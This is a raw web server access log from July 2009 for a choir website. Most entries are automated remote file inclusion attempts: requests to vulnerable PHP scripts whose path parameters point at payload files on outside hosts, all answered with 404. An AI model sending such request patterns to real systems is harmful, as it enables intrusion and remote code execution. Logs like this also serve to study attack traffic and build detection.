70.85.213.106 - - [04/Jul/2009:11:09:39 -0700] "GET /logs/access_090103.log//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:09:55 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:09:56 -0700] "GET /logs/access_090603.log%20%20//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:09:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /logs/access_090517.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:39 -0700] "GET /logs/access_090517.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:48 -0700] "GET /logs/access_090517.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:48 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:48 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:49 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:49 -0700] "GET /logs/access_090517.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:10:49 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.29.124 - - [04/Jul/2009:11:12:02 -0700] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:14:47 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:14:47 -0700] "GET /phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:14:48 -0700] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:15:01 -0700] "GET /logs/access_090103.log%20%20//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:15:08 -0700] "GET /logs/access_090626.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:15:23 -0700] "GET /logs/access_090603.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:15:24 -0700] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:15:25 -0700] "GET /logs/access_090603.log%20%20//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:15:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:15:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:15:49 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:15:49 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:15:49 -0700] "GET /logs/access_090528.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:16:09 -0700] "GET /logs/access_090626.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:16:21 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:16:21 -0700] "GET /logs/access_090528.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:16:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:19:28 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:19:41 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:20:04 -0700] "GET /skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:20:04 -0700] "GET /logs/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:20:05 -0700] "GET /logs/access_090528.log/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:21:09 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:21:17 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:12 -0700] "GET /logs/access_090528.log%20%20/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:22:27 -0700] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:22:27 -0700] "GET /logs/com_moofaq/includes/file_includer.php?gzip=0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:22:33 -0700] "GET /logs/access_090626.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:22:38 -0700] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:22:38 -0700] "GET /logs/com_moofaq/includes/file_includer.php?gzip=0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:22:52 -0700] "GET /logs/access_090626.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:52 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:52 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:52 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:52 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:53 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:53 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:55 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:55 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:22:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:01 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:01 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:01 -0700] "GET /logs/access_090414.log%20%20/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:03 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:04 -0700] "GET /logs/access_090528.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:04 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:04 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:10 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:10 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:11 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:11 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:12 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:12 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:18 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:18 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:18 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:22 -0700] "GET / HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:23 -0700] "GET /?N=D HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:24 -0700] "GET /?M=A HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:25 -0700] "GET /?S=A HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:26 -0700] "GET /?D=A HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:27 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:27 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:27 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:27 -0700] "GET /logs/ HTTP/1.1" 200 1081 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:29 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:30 -0700] "GET /x/ HTTP/1.1" 200 516 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:31 -0700] "GET /xxx/ HTTP/1.1" 200 662 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
69.58.178.32 - - [04/Jul/2009:11:23:32 -0700] "GET /xxxx/ HTTP/1.1" 200 522 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:37 -0700] "GET /logs/access_090528.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:43 -0700] "GET /logs/access_090528.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:47 -0700] "GET /logs/access_090528.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:50 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:50 -0700] "GET /logs/access_090528.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:23:51 -0700] "GET /logs/access_090528.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:23:52 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.201.180.130 - - [04/Jul/2009:11:25:40 -0700] "GET /logs/access_090414.log/e404.php?DOCUMENT_ROOT=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.201.180.130 - - [04/Jul/2009:11:25:40 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.201.180.130 - - [04/Jul/2009:11:25:40 -0700] "GET /e404.php?DOCUMENT_ROOT=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:25:49 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:25:49 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
